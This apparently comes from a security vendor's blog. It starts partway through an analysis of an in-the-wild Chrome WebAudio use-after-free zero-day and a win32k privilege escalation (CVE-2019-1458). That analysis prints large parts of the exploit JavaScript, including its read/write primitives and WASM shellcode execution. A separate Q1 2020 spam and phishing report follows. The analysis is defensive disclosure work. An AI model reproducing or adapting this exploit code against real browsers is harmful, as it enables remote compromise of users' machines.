function getSuperPageBase(addr) { let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1); let superPageBaseMask = ~superPageOffsetMask; let superPageBase = addr & superPageBaseMask; return superPageBase; } function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) { let superPageBase = getSuperPageBase(addr); let partitionPageBase = partitionPageIndex << BigInt(14); let finalAddr = superPageBase + partitionPageBase; return finalAddr; } function getPartitionPageIndex(addr) { let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1); let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14); return partitionPageIndex; } function getMetadataAreaBaseFromPartitionSuperPage(addr) { let superPageBase = getSuperPageBase(addr); let systemPageSize = BigInt(0x1000); return superPageBase + systemPageSize; } function getPartitionPageMetadataArea(addr) { let superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1); let partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14); let pageMetadataSize = BigInt(0x20); let partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize; return partitionPageMetadataPtr; }

It’s interesting that the exploit also uses the relatively new built-in BigInt class to handle 64-bit values; authors usually use their own primitives in exploits.

At first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.

let gcPreventer = []; let iirFilters = []; function initialSetup() { let audioCtx = new OfflineAudioContext(1, 20, 3000); let feedForward = new Float64Array(2); let feedback = new Float64Array(1); feedback[0] = 1; feedForward[0] = 0; feedForward[1] = -1; for (let i = 0; i < 256; i++) iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback)); }

After that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects – ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.

async function triggerUaF(doneCb) { let audioCtx = new OfflineAudioContext(2, 0x400000, 48000); let bufferSource = audioCtx.createBufferSource(); let convolver = audioCtx.createConvolver(); let scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1); let channelBuffer = audioCtx.createBuffer(1, 1, 48000); convolver.buffer = channelBuffer; bufferSource.buffer = channelBuffer; bufferSource.loop = true; bufferSource.loopStart = 0; bufferSource.loopEnd = 1; channelBuffer.getChannelData(0).fill(0); bufferSource.connect(convolver); convolver.connect(scriptNode); scriptNode.connect(audioCtx.destination); bufferSource.start(); let finished = false; scriptNode.onaudioprocess = function(evt) { let channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer); for (let j = 0; j < channelDataArray.length; j++) { if (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) { let u64Array = new BigUint64Array(1); let u32Array = new Uint32Array(u64Array.buffer); u32Array[0] = channelDataArray[j + 0]; u32Array[1] = channelDataArray[j + 1]; let leakedAddr = byteSwapBigInt(u64Array[0]); if (leakedAddr >> BigInt(32) > BigInt(0x8000)) leakedAddr -= BigInt(0x800000000000); let superPageBase = getSuperPageBase(leakedAddr); if (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) { finished = true; evt = null; bufferSource.disconnect(); scriptNode.disconnect(); convolver.disconnect(); setTimeout(function() { doneCb(leakedAddr); }, 1); return; } } } }; audioCtx.startRendering().then(function(buffer) { buffer = null; if (!finished) { finished = true; triggerUaF(doneCb); } }); while (!finished) { convolver.buffer = null; convolver.buffer = channelBuffer; await later(100); // wait 100 millseconds } };

This function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:

function later(delay) { return new Promise(resolve => setTimeout(resolve, delay)); }

During execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.

The PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:

function byteSwapBigInt(x) { let result = BigInt(0); let tmp = x; for (let i = 0; i < 8; i++) { result = result << BigInt(8); result += tmp & BigInt(0xFF); tmp = tmp >> BigInt(8); } return result; }

The exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function initialUAFCallback.

let sharedAudioCtx; let iirFilterFeedforwardAllocationPtr; function initialUAFCallback(addr) { sharedAudioCtx = new OfflineAudioContext(1, 1, 3000); let partitionPageIndexDelta = undefined; switch (majorVersion) { case 77: // 77.0.3865.75 partitionPageIndexDelta = BigInt(-26); break; case 76: // 76.0.3809.87 partitionPageIndexDelta = BigInt(-25); break; } iirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0); triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback); }

The exploit uses the leaked pointer to get the address of the raw pointer to the feedforward_ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.

The vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.

let floatArray = new Float32Array(10); let audioBufferArray1 = []; let audioBufferArray2 = []; let imageDataArray = []; async function triggerSecondUAF(addr, doneCb) { let counter = 0; let numChannels = 1; let audioCtx = new OfflineAudioContext(1, 0x100000, 48000); let bufferSource = audioCtx.createBufferSource(); let convolver = audioCtx.createConvolver(); let bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000); let smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000); smallAudioBuffer.getChannelData(0).fill(0); for (let i = 0; i < numChannels; i++) { let channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer); channelDataArray[0] = addr; } bufferSource.buffer = bigAudioBuffer; convolver.buffer = smallAudioBuffer; bufferSource.loop = true; bufferSource.loopStart = 0; bufferSource.loopEnd = 1; bufferSource.connect(convolver); convolver.connect(audioCtx.destination); bufferSource.start(); let finished = false; audioCtx.startRendering().then(function(buffer) { buffer = null; if (finished) { audioCtx = null; setTimeout(doneCb, 200); return; } else { finished = true; setTimeout(function() { triggerSecondUAF(addr, doneCb); }, 1); } }); while (!finished) { counter++; convolver.buffer = null; await later(1); // wait 1 millisecond if (finished) break; for (let i = 0; i < iirFilters.length; i++) { floatArray.fill(0); iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray); if (floatArray[0] != 3.1415927410125732) { finished = true; audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000)); audioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000)); bufferSource.disconnect(); convolver.disconnect(); return; } } convolver.buffer = smallAudioBuffer; await later(1); // wait 1 millisecond } }

This time the exploit uses the function getFrequencyResponse() to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.

void IIRDSPKernel::GetFrequencyResponse(int n_frequencies, const float* frequency_hz, float* mag_response, float* phase_response) { ... Vector<float> frequency(n_frequencies); double nyquist = this->Nyquist(); // Convert from frequency in Hz to normalized frequency (0 -> 1), // with 1 equal to the Nyquist frequency. for (int k = 0; k < n_frequencies; ++k) frequency[k] = frequency_hz[k] / nyquist; ...

If the resulting array contains a value other than π, it means exploitation was successful. If that’s the case, the exploit stops its recursion and executes the function finalUAFCallback to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.

async function finalUAFCallback() { for (let i = 0; i < 256; i++) { floatArray.fill(0); iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray); if (floatArray[0] != 3.1415927410125732) { await collectGargabe(); audioBufferArray2 = []; for (let j = 0; j < 80; j++) audioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000)); iirFilters = new Array(1); await collectGargabe(); for (let j = 0; j < 336; j++) imageDataArray.push(new ImageData(1, 2)); imageDataArray = new Array(10); await collectGargabe(); for (let j = 0; j < audioBufferArray1.length; j++) { let auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer); if (auxArray[0] != BigInt(0)) { kickPayload(auxArray); return; } } return; } } }

Heap defragmentation is performed with multiple calls to the improvised collectGarbage function that creates a huge ArrayBuffer in a loop.

function collectGargabe() { let promise = new Promise(function(cb) { let arg; for (let i = 0; i < 400; i++) new ArrayBuffer(1024 * 1024 * 60).buffer; cb(arg); }); return promise; }

After those steps, the exploit executes the function kickPayload() passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray’s data.

async function kickPayload(auxArray) { let audioCtx = new OfflineAudioContext(1, 1, 3000); let partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0])); auxArray[0] = byteSwapBigInt(partitionPagePtr); let i = 0; do { gcPreventer.push(new ArrayBuffer(8)); if (++i > 0x100000) return; } while (auxArray[0] != BigInt(0)); let freelist = new BigUint64Array(new ArrayBuffer(8)); gcPreventer.push(freelist); ...

The exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.

function read64(rwHelper, addr) { rwHelper[0] = addr; var tmp = new BigUint64Array; tmp.buffer; gcPreventer.push(tmp); return byteSwapBigInt(rwHelper[0]); } function write64(rwHelper, addr, value) { rwHelper[0] = addr; var tmp = new BigUint64Array(1); tmp.buffer; tmp[0] = value; gcPreventer.push(tmp); }

After the building of the arbitrary read/write primitives comes the final stage – executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a “dummy” WASM module and it results in the allocation of memory pages for JIT compiled code.

const wasmBuffer = new Uint8Array([...]); const wasmBlob = new Blob([wasmBuffer], { type: "application/wasm" }); const wasmUrl = URL.createObjectURL(wasmBlob); var wasmFuncA = undefined; WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) { wasmFuncA = result.instance.exports.a; });

To execute the exported function wasmFuncA, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the getPartitionPageFreeListHeadEntryBySlotSize() function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.

let fileReader = new FileReader; let fileReaderLoaderSize = 0x140; let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize); if (!fileReaderLoaderPtr) return; fileReader.readAsArrayBuffer(new Blob([])); let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize); if (fileReaderLoaderPtr == fileReaderLoaderTestPtr) return;

The exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.

fileReader.onerror = wasmFuncA; let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68); let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28)); let registeredEventListenerPtr = read64(freelist, vectorPtr); let eventListenerPtr = read64(freelist, registeredEventListenerPtr); let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8)); let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8)); let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1); let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1); let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1); let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1); let stubAddrFieldOffset = undefined; switch (majorVersion) { case 77: stubAddrFieldOffset = BigInt(0x8) * BigInt(16); break; case 76: stubAddrFieldOffset = BigInt(0x8) * BigInt(17); break } let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);

The variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it’s sufficient to overwrite it with shellcode. To do so, the exploit uses the function getPartitionPageFreeListHeadEntryBySlotSize() again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.

let arrayBufferSize = 0x20; let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize); if (!arrayBufferPtr) return; let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000); gcPreventer.push(audioBuffer);

The exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.

let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8)); write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr); write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));

Now all that’s needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.

let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer); payloadArray.set(shellcode, 0); payloadArray.set(peBinary, shellcode.length);

To prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.

write64(freelist, partitionPagePtr, BigInt(0));

Now, in order to execute the shellcode, it’s enough to call the exported WASM function.

try { wasmFuncA(); } catch (e) {}

Microsoft Windows elevation of privilege exploit

The shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome’s sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That’s quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It’s also important to note that Google Chrome has a special security feature called Win32k lockdown developed and supported by James Forshaw of Google Project Zero. This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it’s fair to assume that Operation WizardOpium targeted users running Windows 7.

CVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there’s a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It’s worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There’s a common issue when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.

xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...) ... if ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) ) ... extraData = (BYTE*)tagWND + sizeof(tagWND) + index old = *(QWORD*)extraData; *(QWORD*)extraData = data; return old;

A check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.

Triggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.

gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);

It’s important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of xxxSwitchWndProc and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.

LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam) { ... pti = *(tagTHREADINFO **)&gptiCurrent; if ( wnd->fnid != FNID_SWITCH ) { if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] ) return 0i64; if ( msg != 1 ) return xxxDefWindowProc(wnd, msg, wParam, lParam); if ( wnd[1].head.h ) return 0i64; wnd->fnid = FNID_SWITCH; } switch ( msg ) { case WM_CREATE: zzzSetCursor(wnd->pcls->spcur, pti, 0i64); break; case WM_CLOSE: xxxSetWindowPos(wnd, 0, 0); xxxCancelCoolSwitch(); break; case WM_ERASEBKGND: case WM_FULLSCREEN: pti->ptl = (_TL *)&pti->ptl; ++wnd->head.cLockObj; xxxPaintSwitchWindow(wnd, pti, 0i64); ThreadUnlock1(); return 0i64; } return xxxDefWindowProc(wnd, msg, wParam, lParam); }

The vulnerability in NtUserSetWindowLongPtr can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.

At this stage it’s enough to call NtUserMessageCall again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function xxxPaintSwitchWindow that increments and decrements a couple of integers located by the pointer that we previously set.

sub [rdi+60h], ebx add [rdi+68h], ebx ... sub [rdi+5Ch], ecx add [rdi+64h], ecx

An important condition for triggering the exploitable code path is that the ALT key needs to be pressed.

Exploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable technique: in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common technique that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.

The whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.

The pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function EnumDeviceDrivers. This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.

It’s worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.

Conclusions

It was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn’t allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.

We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation.

2020. május 26.

Spam and phishing in Q1 2020

Quarterly highlights Don’t get burned

Burning Man is one of the most eagerly awaited events among fans of spectacular performance and installation art. The main obstacle to attending is the price of admission: a standard ticket will set you back $475, the number is limited, and the buying process is a challenge all by itself (there are several stages, registration data must be entered at a specific time, and if something goes wrong you might not get a second chance). Therefore, half-price fake tickets make for excellent bait.

Scammers tried to make their website as close as possible to the original — even the page with the ticket description looked genuine.

There were just three major differences from the original: only the main page and the ticket purchase section were actually operational, tickets were “sold” without prior registration, and the price was a steal ($225 versus $475).

Oscar-winning scammers

February 2020 saw the 92nd Academy Awards ceremony. Even before the big night, websites were popping up offering free viewings of all the nominated films. Fraudsters targeted users eager to see the short-listed movies before the presentation of the awards.

To promote these sites, Twitter accounts were created — one for each nominated film.

Curious users were invited to visit the resource, where they were shown the first few minutes before being asked to register to continue watching.

During registration, the victim was prompted to enter their bank card details, allegedly to confirm their region of residence. Unsurprisingly, a short while later a certain amount of money disappeared from their account, and the movie did not resume.

Users should be alert to the use of short links in posts on social networks. Scammers often use them because it’s impossible to see where a shortened URL points without actually following it.

There are special services that let you check what lies behind such links, often with an additional bonus in the form of a verdict on the safety of the website content. It is important to do a proper check on links from untrusted sources.

ID for hire

US companies that leak customer data can be heavily fined by the Federal Trade Commission (FTC). For example, in 2019 Facebook was slapped with a $5 billion penalty; however, users whose data got stolen do not receive any compensation. This is what scammers decided to exploit by sending a fake e-mail offering compensation from the non-existent Personal Data Protection Fund, created by the equally fictitious US Trading Commission.

Inspired by the idea of services for checking accounts for leaks, the cybercriminals decided to create their own. Visitors were invited to check whether their account details had been stolen, and if so (the answer was “yes” even if the input was gibberish), they were promised compensation “for the leakage of personal data.”

To receive “compensation,” the victim’s citizenship was of no consequence — what mattered was their first name, last name, phone number, and social network accounts. For extra authenticity, a warning message about the serious consequences of using other people’s data to claim compensation popped up obsessively on the page.

To receive the payment, US citizens were asked to enter their Social Security Number (SSN). Everyone else had to check the box next to the words “I’am don’t have SSN” (the mistakes are a good indicator of a fake), whereupon they were invited to “rent” an SSN for $9. Interestingly, even if the user already had an SSN, they were still pestered to get another one.

After that, the potential victim was redirected to a payment page with the amount and currency based on the user’s location. For instance, users in Russia were asked to pay in rubles.

The scam deployed the conventional scheme (especially common in the Runet) of asking the victim to pay a small commission or down payment for the promise of something much bigger. In Q1, 14,725,643 attempts to redirect users to such websites were blocked.

Disaster and pandemic Fires in Australia

The natural disaster that hit the Australian continent was another get-rich opportunity for scammers. For example, one “Nigerian prince”-style e-mail scam reported that a millionaire dying of cancer was ready to donate her money to save the Australian forests. The victim was asked to help withdraw the funds from the dying woman’s account by paying a fee or making a small contribution to pay for the services of a lawyer, for which they would be rewarded handsomely at a later date.

Besides the fictional millionaire, other “nature lovers” were keen to help out — their e-mails were more concise, but the scheme was essentially the same.

COVID-19 “Nigerian prince” scheme

COVID-19 was (and continues to be) a boon to scammers: non-existent philanthropists and dying millionaires are popping up everywhere offering rewards for help to withdraw funds supposedly for humanitarian purpsoses. Some recipients were even invited to help finance the production of a miracle vaccine, or take part in a charity lottery, the proceeds of which, it was said, would be distributed to poor people affected by the pandemic.

Bitcoin for coronavirus

Having introduced themselves as members of a healthcare organization, the scammers appealed to the victim to transfer a certain sum to the Bitcoin wallet specified in the message. The donation would allegedly go toward fighting the coronavirus outbreak and developing a vaccine, as well as helping victims of the pandemic.

In one e-mail, the attackers played on people’s fear of contracting COVID-19: the message was from an unnamed “neighbor” claiming to be dying from the virus and threatening to infect the recipient unless the latter paid a ransom (which, it was said, would help provide a comfortable old age for the ransomer’s parents).

Dangerous advice from the WHO

One fraudulent mailing disguised as a WHO newsletter offered tips about staying safe from COVID-19.

To get the information, the recipient had to click a link pointing to a fake WHO website. The design was so close to the original that only the URL gave away the scam. The cybercriminals were after login credentials for accounts on the official WHO site. Whereas in the first mailings only a username and password were asked for, in later ones a phone number was also requested.

In addition, we detected several e-mails supposedly from the WHO containing documents with malware. The recipient was asked to open the attachment (in DOC or PDF format), which allegedly offered coronavirus prevention advice. For example, this message contained Backdoor.Win32.Androm.tvmf:

There were other, less elaborate mailings with harmful attachments, including ones containing Trojan-Spy.Win32.Noon.gen:

 

Corporate segment

The coronavirus topic was also exploited in attacks on the corporate sector. For example, COVID-19 was cited in fraudulent e-mails as a reason for delayed shipments or the need to reorder. The authors marked the e-mails as urgent and required to check attached files immediately.

Another mailing prompted recipients to check whether their company was in a list of firms whose activities were suspended due to the pandemic. After which it asked for a form to be filled out, otherwise the company could be shut down. Both the list of companies and the form were allegedly in the archives attached to the message. In actual fact, the attachments contained Trojan-PSW.MSIL.Agensla.a:

We also registered a phishing attack on corporate users. On a fake page, visitors were invited to monitor the coronavirus situation across the world using a special resource, for which the username and password of the victim’s corporate mail account were required.

Government compensation

The introduction of measures to counter the pandemic put many people in a difficult financial situation. Forced downtime in many industries has had a negative impact on financial well-being. In this climate, websites offering compensation from the government pose a particular danger.

One such popular scheme was highlighted by a colleague of ours from Brazil. A WhatsApp messages about financial or food assistance were sent that appeared to come from a supermarket, bank, or government department. To receive the aid, the victim had to fill out the attached form and share the message with a certain number of contacts. After the form was filled out, the data was sent to the cybercriminals, while the victim got redirected to a page with advertising, a phishing site, a site offering a paid SMS subscription, or similar.

Given that the number of fake sites offering government handouts seems likely only to increase, we urge caution when it comes to promises of compensation or material assistance.

Anti-coronavirus protection with home delivery

Due to the pandemic, demand for antiseptics and antiviral agents has spiked. We registered a large number of mailings with offers to buy antibacterial masks.

In Latin America, WhatsApp mass messages were used to invite people to take part in a prize draw for hand sanitizer products from the brewing company Ambev. The company has indeed started making antiseptics and hand gel, but exclusively for public hospitals, so the giveaway was evidently the work of fraudsters.

The number of fake sites offering folk remedies for the treatment of coronavirus, drugs to strengthen the immune system, and non-contact thermometers and test kits has also risen sharply. Most of the products on offer have no kind of certification whatsoever.

On average, the daily share of e-mails mentioning COVID-19 in Q1 amounted to around 6% of all junk traffic. More than 50% of coronavirus-related spam was in the English language. We anticipate that the number of phishing sites and pandemic-related scams will only increase, and that cybercriminals will use new attack schemes and strategies.

Statistics: spam Proportion of spam in mail traffic

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Proportion of spam in global mail traffic, Q4 2019 – Q1 2020 (download)

In Q1 2020, the largest share of spam was recorded in January (55.76%). The average percentage of spam in global mail traffic was 54.61%, down 1.58 p.p. against the previous reporting period.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Proportion of spam in Runet mail traffic, Q4 2019 – Q1 2020 (download)

In Q1, the share of spam in Runet traffic (the Russian segment of the Internet) likewise peaked in January (52.08%). At the same time, the average indicator, as in Q4 2019, remains slightly lower than the global average (by 3.20 p.p.).

Sources of spam by country

 

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Sources of spam by country, Q1 2020 (download)

In Q1 2020, Russia led the TOP 5 countries by amount of outgoing spam. It accounted for 20.74% of all junk traffic. In second place came the US (9.64%), followed by Germany (9.41%) just 0.23 p.p. behind. Fourth place goes to France (6.29%) and fifth to China (5.22%), which is usually a TOP 3 spam source.

Brazil (3.56%) and the Netherlands (3.38%) took sixth and seventh positions, respectively, followed by Vietnam (2.55%), with Spain (2.34%) and Poland (2.21%) close on its heels in ninth and tenth.

Spam e-mail size

 

